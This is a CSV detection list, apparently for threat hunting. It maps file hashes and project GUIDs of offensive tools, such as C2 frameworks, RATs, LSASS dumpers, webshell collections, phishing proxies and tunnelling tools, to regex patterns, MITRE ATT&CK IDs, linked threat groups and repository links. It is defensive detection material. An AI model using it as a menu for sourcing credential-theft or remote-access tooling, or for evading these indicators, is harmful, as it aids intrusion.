"*5529ff4b4c60d1cfefb02f145e149ffb166229e03aff4d8917340190753cde9e*",".{0,1000}5529ff4b4c60d1cfefb02f145e149ffb166229e03aff4d8917340190753cde9e.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#filehash","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","26859" "*5531A5C5-8710-48AD-BEFE-88E26F6CF798*",".{0,1000}5531A5C5\-8710\-48AD\-BEFE\-88E26F6CF798.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#GUIDProject","N/A","9","","N/A","","","","26861" "*553282d19684e327d410ace6c54aa6cbdecba1eb2e67ecbae0e44d46426eca82*",".{0,1000}553282d19684e327d410ace6c54aa6cbdecba1eb2e67ecbae0e44d46426eca82.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","26862" "*55341dfe5a2e7ff47bde6573885693ec67d9662c40a7b321059fe1af6d5babaf*",".{0,1000}55341dfe5a2e7ff47bde6573885693ec67d9662c40a7b321059fe1af6d5babaf.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","26863" "*553447c0b7f3f66e4056047c98783665a17097b0a2aca74a507e56a6d7c1e889*",".{0,1000}553447c0b7f3f66e4056047c98783665a17097b0a2aca74a507e56a6d7c1e889.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26864" "*553783ac96602dadd391b657eec078f7ab768c1b06bc04373e9fe9068f113041*",".{0,1000}553783ac96602dadd391b657eec078f7ab768c1b06bc04373e9fe9068f113041.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","26865" "*553a143020a31eef62e4c616b44a15e63549897111af6d5c472ec46ec02bc240*",".{0,1000}553a143020a31eef62e4c616b44a15e63549897111af6d5c472ec46ec02bc240.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26866" "*5548fb14ad8d39bd75f82540c19e571edcc8dabb3ba6b4b46f488bfad3035e07*",".{0,1000}5548fb14ad8d39bd75f82540c19e571edcc8dabb3ba6b4b46f488bfad3035e07.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26867" "*554F8E48FA40E48E261B91A4F9F1930E099EBF337DFAC826BC41F4E850C4889F*",".{0,1000}554F8E48FA40E48E261B91A4F9F1930E099EBF337DFAC826BC41F4E850C4889F.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","26868" "*555009ba8f9b57011fef7ca143c78e15d11bce2e471f6b742cbddda5c2d12e60*",".{0,1000}555009ba8f9b57011fef7ca143c78e15d11bce2e471f6b742cbddda5c2d12e60.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","26869" "*555662D4CCBB940D87869E6295EC7CC74BB85D8C8FC5916EC34D1226704578C5*",".{0,1000}555662D4CCBB940D87869E6295EC7CC74BB85D8C8FC5916EC34D1226704578C5.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","#filehash","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","26870" "*555AD0AC-1FDB-4016-8257-170A74CB2F55*",".{0,1000}555AD0AC\-1FDB\-4016\-8257\-170A74CB2F55.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","#GUIDproject","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","26871" "*555AD0AC-1FDB-4016-8257-170A74CB2F55*",".{0,1000}555AD0AC\-1FDB\-4016\-8257\-170A74CB2F55.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","#GUIDproject","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","26872" "*555e208fdc7f01d35922ceb80bd2a1088f6cef78e8f2e49f115b628a15984001*",".{0,1000}555e208fdc7f01d35922ceb80bd2a1088f6cef78e8f2e49f115b628a15984001.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26873" "*55625889-F7BB-4533-9702-DDE98FBB0DDF*",".{0,1000}55625889\-F7BB\-4533\-9702\-DDE98FBB0DDF.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","26874" "*55652291077fbb6c957ea42379d965892e29695a85ce00844c7b1c83971ac1e6*",".{0,1000}55652291077fbb6c957ea42379d965892e29695a85ce00844c7b1c83971ac1e6.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","26876" 
"*556604aedbff01f33a7df0040641cf6bad183eab1c84a5ecdd90521762b04c54*",".{0,1000}556604aedbff01f33a7df0040641cf6bad183eab1c84a5ecdd90521762b04c54.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26877" "*5571bc0232f7f7911042503b2a2224ad420788d999eb819257a00943928a56bb*",".{0,1000}5571bc0232f7f7911042503b2a2224ad420788d999eb819257a00943928a56bb.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","#filehash","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","26878" "*5576bc01df05427e60683abf6c5f01b6a3ec4fbeee43ae68bb1fb20ba14b49a1*",".{0,1000}5576bc01df05427e60683abf6c5f01b6a3ec4fbeee43ae68bb1fb20ba14b49a1.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26882" "*5584e3e3bbef3abc02ab49d0d5d06f6cb021becd41da4600dce3096830ce39c5*",".{0,1000}5584e3e3bbef3abc02ab49d0d5d06f6cb021becd41da4600dce3096830ce39c5.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26885" 
"*5585684234d4f65469f743db35a100a4aaa2c7d89fe8005dba4698885e0c53b6*",".{0,1000}5585684234d4f65469f743db35a100a4aaa2c7d89fe8005dba4698885e0c53b6.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26886" "*558919265d6ae62662b5326b9dfa3a03b7a07bb9b657bc13130adc12124d06d0*",".{0,1000}558919265d6ae62662b5326b9dfa3a03b7a07bb9b657bc13130adc12124d06d0.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","26887" "*558a73bf1f4a3ecc59133a10d1a7892712f2bd30326f86a12d5c7060274d734d*",".{0,1000}558a73bf1f4a3ecc59133a10d1a7892712f2bd30326f86a12d5c7060274d734d.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","#filehash","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","26888" 
"*558df705dd4b6213c11e858b7c32960eaec39360*",".{0,1000}558df705dd4b6213c11e858b7c32960eaec39360.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","26889" "*559917334e8dd6e6828011019d20c15f23ab49a9747a08aaca275c6d44a5d811*",".{0,1000}559917334e8dd6e6828011019d20c15f23ab49a9747a08aaca275c6d44a5d811.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26890" "*559b3c946bba5edb17f646da5b0b4e259ad3af12aafea6744b1502230419cd6b*",".{0,1000}559b3c946bba5edb17f646da5b0b4e259ad3af12aafea6744b1502230419cd6b.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","#filehash","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","26891" 
"*559d2cb3e75785c41dea1e308eac3fa511ee44cfaef8f9ca6845703ae830edf1*",".{0,1000}559d2cb3e75785c41dea1e308eac3fa511ee44cfaef8f9ca6845703ae830edf1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26892" "*559e5ff2b8afb25bbc62275355ba2ceb668e8707de6b221315afb6c2390ba68e*",".{0,1000}559e5ff2b8afb25bbc62275355ba2ceb668e8707de6b221315afb6c2390ba68e.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","26893" "*55a3bbb8a62578b455e478cb197aadd389f2e65418595e5df4636972be878710*",".{0,1000}55a3bbb8a62578b455e478cb197aadd389f2e65418595e5df4636972be878710.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","26895" "*55A48A19-1A5C-4E0D-A46A-5DB04C1D8B03*",".{0,1000}55A48A19\-1A5C\-4E0D\-A46A\-5DB04C1D8B03.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","#GUIDproject","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","26896" 
"*55aba2fe1944249b237e454bba9302328d526b11ace6ac9abe31532ef3598501*",".{0,1000}55aba2fe1944249b237e454bba9302328d526b11ace6ac9abe31532ef3598501.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26898" "*55abc5a3fcc9e06b848f9d81d93ed2771947d01491f99ef3f55556f5b2a183ef*",".{0,1000}55abc5a3fcc9e06b848f9d81d93ed2771947d01491f99ef3f55556f5b2a183ef.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26899" "*55ac39fc6d45b2e315df43a71380ca8c20e62e28b9531e56d920e6f45103388d*",".{0,1000}55ac39fc6d45b2e315df43a71380ca8c20e62e28b9531e56d920e6f45103388d.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#filehash","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","26900" "*55adb997fbda60a19f5a9c98d602976d6d30cb7ab1a4c636224e442ff4054ac2*",".{0,1000}55adb997fbda60a19f5a9c98d602976d6d30cb7ab1a4c636224e442ff4054ac2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26901" "*55b47d76298d6f56ea19a06c6bab41145675717159890d4787fe83c8785bbf23*",".{0,1000}55b47d76298d6f56ea19a06c6bab41145675717159890d4787fe83c8785bbf23.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","26904" "*55b8235e7a749bac3ce56589298727a4314ea2e2ac9ba706b183ca3781cc16f8*",".{0,1000}55b8235e7a749bac3ce56589298727a4314ea2e2ac9ba706b183ca3781cc16f8.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","0","#filehash","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","26905" "*55ba57a3e7763af586b0be21f23454a7e7ea9cd537ebd06bf9b5f3cc2cf53d6e*",".{0,1000}55ba57a3e7763af586b0be21f23454a7e7ea9cd537ebd06bf9b5f3cc2cf53d6e.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","26906" "*55bb7968642a55819b608e5e2e732982424b6f47e5ef774a0a35dff202f6321f*",".{0,1000}55bb7968642a55819b608e5e2e732982424b6f47e5ef774a0a35dff202f6321f.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access 
trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","26907" "*55bd5fa243002914817f32fb28c16579d57cf21b12406d350b226de472b66856*",".{0,1000}55bd5fa243002914817f32fb28c16579d57cf21b12406d350b226de472b66856.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","26908" "*55be8a40ac5f75e95f27147cba581018de3857140f8fdb2ad13016b6c29bc7be*",".{0,1000}55be8a40ac5f75e95f27147cba581018de3857140f8fdb2ad13016b6c29bc7be.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26909" "*55cb93078b605122dcef64a6680ca4dd2217fc0668704b0363bb227811b180a3*",".{0,1000}55cb93078b605122dcef64a6680ca4dd2217fc0668704b0363bb227811b180a3.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","26911" "*55d11ca1d51a951627e693d7c26536528c24afd46ea7a1f8bf99907066f62ed4*",".{0,1000}55d11ca1d51a951627e693d7c26536528c24afd46ea7a1f8bf99907066f62ed4.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#filehash","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","26912" "*55d70f97e0f0c76b7a6ed08178f83ccd5505e8c62213d1fdf5221bc60cf3ffe0*",".{0,1000}55d70f97e0f0c76b7a6ed08178f83ccd5505e8c62213d1fdf5221bc60cf3ffe0.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","26913" "*55d72ecccc3e6bbf42653009b63e1c1e90b134714aca78dfd36ec35003bc3d76*",".{0,1000}55d72ecccc3e6bbf42653009b63e1c1e90b134714aca78dfd36ec35003bc3d76.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","0","#filehash","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","26914" "*55d7fe012433dbdd8a99de24de054be597277f0e7491db62041737e49823f003*",".{0,1000}55d7fe012433dbdd8a99de24de054be597277f0e7491db62041737e49823f003.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","26915" "*55d8c97ec4476f7ada4f2991de85f6ddb973ac4634dc0a08e2c731d75c5700b3*",".{0,1000}55d8c97ec4476f7ada4f2991de85f6ddb973ac4634dc0a08e2c731d75c5700b3.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","26916" "*55e4a7e082fde26e6fbec0235f5e722e07234e14026d9c18f24a0e126777d8ef*",".{0,1000}55e4a7e082fde26e6fbec0235f5e722e07234e14026d9c18f24a0e126777d8ef.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26917" "*55e668d2bed139453ab6c9d17caa15772e47d8d65905cd38f7ef10be5785a967*",".{0,1000}55e668d2bed139453ab6c9d17caa15772e47d8d65905cd38f7ef10be5785a967.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26918" "*55e85cf923faed84769d3b61cd10bb2d444edb20ffaf1cbfd5af304d6add3cdd*",".{0,1000}55e85cf923faed84769d3b61cd10bb2d444edb20ffaf1cbfd5af304d6add3cdd.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","26919" 